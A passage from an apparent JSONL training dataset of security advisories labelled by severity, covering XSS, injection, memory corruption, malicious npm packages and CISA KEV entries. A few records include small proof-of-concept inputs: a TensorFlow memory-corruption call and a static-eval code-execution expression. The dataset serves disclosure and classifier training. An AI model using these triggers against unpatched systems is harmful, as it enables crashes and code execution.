vulnerability in `fastify-multipart` < 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "fd88e99214264631936d", "text": "CSRF tokens leaked in URL by canned query form\n\n### Impact\n\nThe HTML form for a read-only canned query includes the hidden CSRF token field added in #798 for writable canned queries (#698).\n\nThis means that submitting those read-only forms exposes the CSRF token in the URL - for example on https://latest.datasette.io/fixtures/neighborhood_search submitting the form took me to:\n\nhttps://latest.datasette.io/fixtures/neighborhood_search?text=down&csrftoken=CSRFTOKEN-HERE\n\nThis token could potentially leak to an attacker if the resulting page has a link to an external site on it and the user clicks the link, since the token would be exposed in the referral logs.\n\n### Patches\n\nA fix for this issue has been released in Datasette 0.46.\n\n### Workarounds\n\nYou can fix this issue in a Datasette instance without upgrading by copying the [0.46 query.html template](https://raw.githubusercontent.com/simonw/datasette/0.46/datasette/templates/query.html) into a custom `templates/` directory and running Datasette with the `--template-dir=templates/` option.\n\n### References\n\nIssue 918 discusses this in details: https://github.com/simonw/datasette/issues/918\n\n### For more information\n\nContact swillison at gmail with any questions.", "text_raw": "CSRF tokens leaked in URL by canned query form\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe HTML form for a read-only canned query includes the hidden CSRF token field added in #798 for writable canned queries (#698).\n\nThis means that submitting those read-only forms exposes the CSRF token in the URL - for example on https://latest.datasette.io/fixtures/neighborhood_search submitting the form took me to:\n\nhttps://latest.datasette.io/fixtures/neighborhood_search?text=down&csrftoken=CSRFTOKEN-HERE\n\nThis token could potentially leak to an attacker if the resulting page has a link to an external site on it and the user clicks the link, since the token would be exposed in the referral logs.\n\n### Patches\n\nA fix for this issue has been released in Datasette 0.46.\n\n### Workarounds\n\nYou can fix this issue in a Datasette instance without upgrading by copying the [0.46 query.html template](https://raw.githubusercontent.com/simonw/datasette/0.46/datasette/templates/query.html) into a custom `templates/` directory and running Datasette with the `--template-dir=templates/` option.\n\n### References\n\nIssue 918 discusses this in details: https://github.com/simonw/datasette/issues/918\n\n### For more information\n\nContact swillison at gmail with any questions.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-08-11", "split": "train"} -{"id": "d05a613950890354c8a2", "text": "XSS in `*Text` options of the Datepicker widget in jquery-ui\n\n### Impact\nAccepting the value of various `*Text` options of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way:\n```js\n$( \"#datepicker\" ).datepicker( {\n\tshowButtonPanel: true,\n\tshowOn: \"both\",\n\tcloseText: \"\",\n\tcurrentText: \"\",\n\tprevText: \"\",\n\tnextText: \"\",\n\tbuttonText: \"\",\n\tappendText: \"\",\n} );\n```\nwill call `doEvilThing` with 6 different parameters coming from all `*Text` options.\n\n### Patches\nThe issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML.\n\n### Workarounds\nA workaround is to not accept the value of the `*Text` options from untrusted sources.\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.", "text_raw": "XSS in `*Text` options of the Datepicker widget in jquery-ui\n\n[Severity: MEDIUM]\n\n### Impact\nAccepting the value of various `*Text` options of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way:\n```js\n$( \"#datepicker\" ).datepicker( {\n\tshowButtonPanel: true,\n\tshowOn: \"both\",\n\tcloseText: \"\",\n\tcurrentText: \"\",\n\tprevText: \"\",\n\tnextText: \"\",\n\tbuttonText: \"\",\n\tappendText: \"\",\n} );\n```\nwill call `doEvilThing` with 6 different parameters coming from all `*Text` options.\n\n### Patches\nThe issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML.\n\n### Workarounds\nA workaround is to not accept the value of the `*Text` options from untrusted sources.\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-26", "split": "train"} -{"id": "106260668b3e23a5cb17", "text": "SQL Injection in Subrion CMS\n\nSQL Injection vulnerability in Subrion CMS v4.2.1 in the search page if a website uses a PDO connection.", "text_raw": "SQL Injection in Subrion CMS \n\n[Severity: CRITICAL]\n\nSQL Injection vulnerability in Subrion CMS v4.2.1 in the search page if a website uses a PDO connection.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-08", "split": "train"} -{"id": "adc01100dcb7d001092c", "text": "Atlassian Crowd and Crowd Data Center Remote Code Execution Vulnerability\n\nAffected: Atlassian Crowd and Crowd Data Center\n\nAtlassian Crowd and Crowd Data Center contain a remote code execution vulnerability resulting from a pdkinstall development plugin being incorrectly enabled in release builds.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Atlassian Crowd and Crowd Data Center Remote Code Execution Vulnerability\n\nAffected: Atlassian Crowd and Crowd Data Center\n\nAtlassian Crowd and Crowd Data Center contain a remote code execution vulnerability resulting from a pdkinstall development plugin being incorrectly enabled in release builds.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "2f38c41feed00125a408", "text": "Command injection in get-git-data\n\nget-git-data through 1.3.1 is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.", "text_raw": "Command injection in get-git-data\n\n[Severity: CRITICAL]\n\nget-git-data through 1.3.1 is vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the arguments provided to get-git-data.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "55118f9946d5f99d9fea", "text": "Malicious Package in bitcoijns-lib\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bitcoijns-lib\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "8f850f4606aef23ece6e", "text": "Splash authentication credentials potentially leaked to target websites\n\n### Impact\n\nIf you use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for Splash authentication, any non-Splash request will expose your credentials to the request target. This includes `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`.\n\n### Patches\n\nUpgrade to scrapy-splash 0.8.0 and use the new `SPLASH_USER` and `SPLASH_PASS` settings instead to set your Splash authentication credentials safely.\n\n### Workarounds\n\nIf you cannot upgrade, set your Splash request credentials on a per-request basis, [using the `splash_headers` request parameter](https://github.com/scrapy-plugins/scrapy-splash/tree/0.8.x#http-basic-auth), instead of defining them globally using the [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth).\n\nAlternatively, make sure all your requests go through Splash. That includes disabling the [robots.txt middleware](https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#topics-dlmw-robots).\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/scrapy-plugins/scrapy-splash/issues)\n* [Email us](mailto:opensource@zyte.com)", "text_raw": "Splash authentication credentials potentially leaked to target websites \n\n[Severity: HIGH]\n\n### Impact\n\nIf you use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for Splash authentication, any non-Splash request will expose your credentials to the request target. This includes `robots.txt` requests sent by Scrapy when the `ROBOTSTXT_OBEY` setting is set to `True`.\n\n### Patches\n\nUpgrade to scrapy-splash 0.8.0 and use the new `SPLASH_USER` and `SPLASH_PASS` settings instead to set your Splash authentication credentials safely.\n\n### Workarounds\n\nIf you cannot upgrade, set your Splash request credentials on a per-request basis, [using the `splash_headers` request parameter](https://github.com/scrapy-plugins/scrapy-splash/tree/0.8.x#http-basic-auth), instead of defining them globally using the [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth).\n\nAlternatively, make sure all your requests go through Splash. That includes disabling the [robots.txt middleware](https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#topics-dlmw-robots).\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/scrapy-plugins/scrapy-splash/issues)\n* [Email us](mailto:opensource@zyte.com)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-06", "split": "train"} -{"id": "0bf090c19b9d749b6a7b", "text": "Cross-Site Scripting in bootstrap-tagsinput\n\nAll versions of `bootstrap-tagsinput` are vulnerable to cross-site scripting when user input is passed into the `itemTitle` parameter unmodified, as the package fails to properly sanitize or encode user input for that parameter.\n\n## Recommendation\n\nThis package is not actively maintained, and has not seen an update since 2015.\n\nBecause of this, the simplest mitigation is to avoid using the `itemTitle` parameter. With over 200 open issues and over 100 open pull requests as of 2/2018, it seems unlikely that the author has any intention of maintaining the module. If avoiding the use of `itemTitle` indefinitely is acceptable, this is a workable solution. If not, the best available mitigation is to use a fork of the module that is actively maintained and provides similar functionality. There are [many such forks to choose from available on github.](https://github.com/bootstrap-tagsinput/bootstrap-tagsinput/network/members).", "text_raw": "Cross-Site Scripting in bootstrap-tagsinput\n\n[Severity: HIGH]\n\nAll versions of `bootstrap-tagsinput` are vulnerable to cross-site scripting when user input is passed into the `itemTitle` parameter unmodified, as the package fails to properly sanitize or encode user input for that parameter.\n\n\n\n## Recommendation\n\nThis package is not actively maintained, and has not seen an update since 2015. \n\nBecause of this, the simplest mitigation is to avoid using the `itemTitle` parameter. With over 200 open issues and over 100 open pull requests as of 2/2018, it seems unlikely that the author has any intention of maintaining the module. If avoiding the use of `itemTitle` indefinitely is acceptable, this is a workable solution. If not, the best available mitigation is to use a fork of the module that is actively maintained and provides similar functionality. There are [many such forks to choose from available on github.](https://github.com/bootstrap-tagsinput/bootstrap-tagsinput/network/members).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "d059e39ecdc70017af95", "text": "Malicious Package in node-spdy\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "text_raw": "Malicious Package in node-spdy\n\n[Severity: CRITICAL]\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "8f10713faa0abc33c0fb", "text": "Microsoft .NET Framework Remote Code Execution Vulnerability\n\nAffected: Microsoft .NET Framework\n\nMicrosoft .NET Framework contains a remote code execution vulnerability when processing untrusted input that could allow an attacker to take control of an affected system.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft .NET Framework Remote Code Execution Vulnerability\n\nAffected: Microsoft .NET Framework\n\nMicrosoft .NET Framework contains a remote code execution vulnerability when processing untrusted input that could allow an attacker to take control of an affected system.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "b93c40410382af1c0bde", "text": "eCardMAX 10.5 Multiple Vulnerabilities", "text_raw": "eCardMAX 10.5 Multiple Vulnerabilities\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-07-01", "split": "train"} -{"id": "a28393b831a8a3a19dbc", "text": "Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC", "text_raw": "Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2008-10-14", "split": "train"} -{"id": "727cd64c308518b4bd55", "text": "Memory corruption in `DrawBoundingBoxesV2`\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs:\n\n```python\nimport tensorflow as tf\n\nimages = tf.fill([10, 96, 0, 1], 0.)\nboxes = tf.fill([10, 53, 0], 0.)\ncolors = tf.fill([0, 1], 0.)\n\ntf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/31bd5026304677faa8a0b77602c6154171b9aec1/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L116-L130) assumes that the last element of `boxes` input is 4, as required by [the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/DrawBoundingBoxesV2). Since this is not checked attackers passing values less than 4 can write outside of bounds of heap allocated objects and cause memory corruption:\n\n```cc \nconst auto tboxes = boxes.tensor();\nfor (int64 bb = 0; bb < num_boxes; ++bb) {\n ...\n const int64 min_box_row = static_cast(tboxes(b, bb, 0)) * (height - 1);\n const int64 max_box_row = static_cast(tboxes(b, bb, 2)) * (height - 1);\n const int64 min_box_col = static_cast(tboxes(b, bb, 1)) * (width - 1);\n const int64 max_box_col = static_cast(tboxes(b, bb, 3)) * (width - 1);\n ...\n}\n```\n\nIf the last dimension in `boxes` is less than 4, accesses similar to `tboxes(b, bb, 3)` will access data outside of bounds. Further during code execution there are also writes to these indices.\n\n### Patches\nWe have patched the issue in GitHub commit [79865b542f9ffdc9caeb255631f7c56f1d4b6517](https://github.com/tensorflow/tensorflow/commit/79865b542f9ffdc9caeb255631f7c56f1d4b6517).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "text_raw": "Memory corruption in `DrawBoundingBoxesV2`\n\n[Severity: LOW]\n\n### Impact\nThe implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs:\n\n```python\nimport tensorflow as tf\n\nimages = tf.fill([10, 96, 0, 1], 0.)\nboxes = tf.fill([10, 53, 0], 0.)\ncolors = tf.fill([0, 1], 0.)\n\ntf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/31bd5026304677faa8a0b77602c6154171b9aec1/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L116-L130) assumes that the last element of `boxes` input is 4, as required by [the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/DrawBoundingBoxesV2). Since this is not checked attackers passing values less than 4 can write outside of bounds of heap allocated objects and cause memory corruption:\n\n```cc \nconst auto tboxes = boxes.tensor();\nfor (int64 bb = 0; bb < num_boxes; ++bb) {\n ...\n const int64 min_box_row = static_cast(tboxes(b, bb, 0)) * (height - 1);\n const int64 max_box_row = static_cast(tboxes(b, bb, 2)) * (height - 1);\n const int64 min_box_col = static_cast(tboxes(b, bb, 1)) * (width - 1);\n const int64 max_box_col = static_cast(tboxes(b, bb, 3)) * (width - 1);\n ...\n}\n``` \n\nIf the last dimension in `boxes` is less than 4, accesses similar to `tboxes(b, bb, 3)` will access data outside of bounds. Further during code execution there are also writes to these indices.\n\n### Patches\nWe have patched the issue in GitHub commit [79865b542f9ffdc9caeb255631f7c56f1d4b6517](https://github.com/tensorflow/tensorflow/commit/79865b542f9ffdc9caeb255631f7c56f1d4b6517).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "efb2e1258e00bc540727", "text": "Code Injection in total.js\n\nThe package total.js before 3.4.9 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.", "text_raw": "Code Injection in total.js\n\n[Severity: CRITICAL]\n\nThe package total.js before 3.4.9 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "6400fb8b89982ac09595", "text": "Nagios XI Remote Code Execution Vulnerability\n\nAffected: Nagios Nagios XI\n\nNagios XI contains a remote code execution vulnerability in which a user can modify the check_plugin executable and insert malicious commands to execute as root.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Nagios XI Remote Code Execution Vulnerability\n\nAffected: Nagios Nagios XI\n\nNagios XI contains a remote code execution vulnerability in which a user can modify the check_plugin executable and insert malicious commands to execute as root.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "7b5e09fbdaf6c1252f45", "text": "Potential Code Injection in Sprout Forms\n\n### Impact\n\nA potential Server-Side Template Injection vulnerability exists in Sprout Forms which could lead to the execution of Twig code.\n\n### Patches\n\nThe problem is fixed in`barrelstrength/sprout-forms:v3.9.0` which upgrades to `barrelstrength/sprout-base-email:v1.2.7`\n\n### Workarounds\n\nUsers unable to upgrade should update any Notification Emails to use the \"Basic Notification (Sprout Email)\" template and avoid using the \"Basic Notification (Sprout Forms)\" template or any custom templates that display Form Fields.\n\n### References\n\n- See the release notes in the [CHANGELOG](https://github.com/barrelstrength/craft-sprout-forms/blob/v3/CHANGELOG.md#390---2020-04-09-critical)\n- Credits to Paweł Hałdrzyński, Daniel Kalinowski from [ISEC.PL](https://isec.pl/) for discovery and responsible disclosure\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in the [Sprout Forms repo](https://github.com/barrelstrength/craft-sprout-forms/issues)\n* Email us at [sprout@barrelstrengthdesign.com](mailto:sprout@barrelstrengthdesign.com)", "text_raw": "Potential Code Injection in Sprout Forms\n\n[Severity: CRITICAL]\n\n### Impact\n\nA potential Server-Side Template Injection vulnerability exists in Sprout Forms which could lead to the execution of Twig code.\n\n### Patches\n\nThe problem is fixed in`barrelstrength/sprout-forms:v3.9.0` which upgrades to `barrelstrength/sprout-base-email:v1.2.7`\n\n### Workarounds\n\nUsers unable to upgrade should update any Notification Emails to use the \"Basic Notification (Sprout Email)\" template and avoid using the \"Basic Notification (Sprout Forms)\" template or any custom templates that display Form Fields.\n\n### References\n\n- See the release notes in the [CHANGELOG](https://github.com/barrelstrength/craft-sprout-forms/blob/v3/CHANGELOG.md#390---2020-04-09-critical)\n- Credits to Paweł Hałdrzyński, Daniel Kalinowski from [ISEC.PL](https://isec.pl/) for discovery and responsible disclosure\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in the [Sprout Forms repo](https://github.com/barrelstrength/craft-sprout-forms/issues)\n* Email us at [sprout@barrelstrengthdesign.com](mailto:sprout@barrelstrengthdesign.com)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-05-08", "split": "train"} -{"id": "3ec67a27a4b3dbf19db0", "text": "Malicious Package in asymc\n\nAll versions of `asymc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "text_raw": "Malicious Package in asymc\n\n[Severity: CRITICAL]\n\nAll versions of `asymc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "1f4cb56ccd37eaa010cf", "text": "BibTeX-Ruby vulnerable to OS command injection\n\nBibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized user input being passed directly to the built-in Ruby `Kernel.open` method through BibTeX.open.", "text_raw": "BibTeX-Ruby vulnerable to OS command injection\n\n[Severity: CRITICAL]\n\nBibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized user input being passed directly to the built-in Ruby `Kernel.open` method through BibTeX.open.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-02-14", "split": "train"} -{"id": "ad5c469082c354785e9c", "text": "File reference keys leads to incorrect hashes on HMAC algorithms\n\n### Impact\n\nUsers of HMAC-based algorithms (HS256, HS384, and HS512) combined with `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference` as key are having their tokens issued/validated using the file path as hashing key - instead of the contents.\n\nThe HMAC hashing functions take any string as input and, since users can issue and validate tokens, people are lead to believe that everything works properly.\n\n### Patches\n\nAll versions have been patched to always load the file contents, deprecated the `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference`, and suggest `Lcobucci\\JWT\\Signer\\Key\\InMemory` as the alternative.\n\n### Workarounds\n\nUse `Lcobucci\\JWT\\Signer\\Key\\InMemory` instead of `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference` to create the instances of your keys:\n\n```diff\n-use Lcobucci\\JWT\\Signer\\Key\\LocalFileReference;\n+use Lcobucci\\JWT\\Signer\\Key\\InMemory;\n\n-$key = LocalFileReference::file(__DIR__ . '/public-key.pem');\n+$key = InMemory::file(__DIR__ . '/public-key.pem');\n```", "text_raw": "File reference keys leads to incorrect hashes on HMAC algorithms\n\n[Severity: MEDIUM]\n\n### Impact\n\nUsers of HMAC-based algorithms (HS256, HS384, and HS512) combined with `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference` as key are having their tokens issued/validated using the file path as hashing key - instead of the contents.\n\nThe HMAC hashing functions take any string as input and, since users can issue and validate tokens, people are lead to believe that everything works properly.\n\n### Patches\n\nAll versions have been patched to always load the file contents, deprecated the `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference`, and suggest `Lcobucci\\JWT\\Signer\\Key\\InMemory` as the alternative.\n\n### Workarounds\n\nUse `Lcobucci\\JWT\\Signer\\Key\\InMemory` instead of `Lcobucci\\JWT\\Signer\\Key\\LocalFileReference` to create the instances of your keys:\n\n```diff\n-use Lcobucci\\JWT\\Signer\\Key\\LocalFileReference;\n+use Lcobucci\\JWT\\Signer\\Key\\InMemory;\n\n-$key = LocalFileReference::file(__DIR__ . '/public-key.pem');\n+$key = InMemory::file(__DIR__ . '/public-key.pem');\n```", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-29", "split": "train"} -{"id": "6258c0c7721e0269486f", "text": "Malicious Package in jr-sha3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in jr-sha3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "a46eaa4c8e7f1bec1511", "text": "Argument Injection in Apache Geode server\n\nWhen an Apache Geode server versions 1.0.0 to 1.8.0 is operating in secure mode, a user with write permissions for specific data regions can modify internal cluster metadata. A malicious user could modify this data in a way that affects the operation of the cluster.", "text_raw": "Argument Injection in Apache Geode server\n\n[Severity: MEDIUM]\n\nWhen an Apache Geode server versions 1.0.0 to 1.8.0 is operating in secure mode, a user with write permissions for specific data regions can modify internal cluster metadata. A malicious user could modify this data in a way that affects the operation of the cluster.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-26", "split": "train"} -{"id": "259e540745f65c133eef", "text": "Improper Restriction of XML External Entity Reference in bedework:bw-webdav\n\nApereo Bedework bw-webdav before 4.0.3 allows XXE attacks, as demonstrated by an invite-reply document that reads a local file, related to webdav/servlet/common/MethodBase.java and webdav/servlet/common/PostRequestPars.java.", "text_raw": "Improper Restriction of XML External Entity Reference in bedework:bw-webdav\n\n[Severity: HIGH]\n\nApereo Bedework bw-webdav before 4.0.3 allows XXE attacks, as demonstrated by an invite-reply document that reads a local file, related to webdav/servlet/common/MethodBase.java and webdav/servlet/common/PostRequestPars.java.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-12-19", "split": "train"} -{"id": "0998582b5af67ea6a167", "text": "Withdrawn: Arbitrary Code Execution in static-eval\n\nAll versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src=\"(function (x) { return ${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")} })()\" var ast = parse(src).body[0].expression; evaluate(ast)\n\n# WITHDRAWN\n\nThis was deemed not a vulnerability. See [this issue](https://github.com/browserify/static-eval/issues/34) for details.", "text_raw": "Withdrawn: Arbitrary Code Execution in static-eval\n\n[Severity: CRITICAL]\n\nAll versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src=\"(function (x) { return ${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")} })()\" var ast = parse(src).body[0].expression; evaluate(ast)\n\n# WITHDRAWN\n\nThis was deemed not a vulnerability. See [this issue](https://github.com/browserify/static-eval/issues/34) for details.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "39fb0e5d6c12ad5445b5", "text": "Cross-site Scripting in quill\n\nA vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned.\n\nThis CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364).", "text_raw": "Cross-site Scripting in quill\n\n[Severity: MEDIUM]\n\nA vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned.\n\nThis CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "3b59ba1199fb0019d498", "text": "QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability", "text_raw": "QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2020-08-13", "split": "train"} -{"id": "5be5b4aa29e96773b52a", "text": "GEOVAP Reliance 4 Control Server Unquoted Service Path Elevation Of Privilege", "text_raw": "GEOVAP Reliance 4 Control Server Unquoted Service Path Elevation Of Privilege\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2015-12-07", "split": "train"} -{"id": "f80a185ed5e06dba81e7", "text": "Out-of-bounds Read in OpenCV\n\nOpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds read error in the function icvCvt_BGRA2BGR_8u_C4C3R when reading an image file by using cv::imread.", "text_raw": "Out-of-bounds Read in OpenCV \n\n[Severity: HIGH]\n\nOpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds read error in the function icvCvt_BGRA2BGR_8u_C4C3R when reading an image file by using cv::imread.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "e2ca1da8689c72cc6ca4", "text": "Auto-merging Person Records Compromised\n\n### 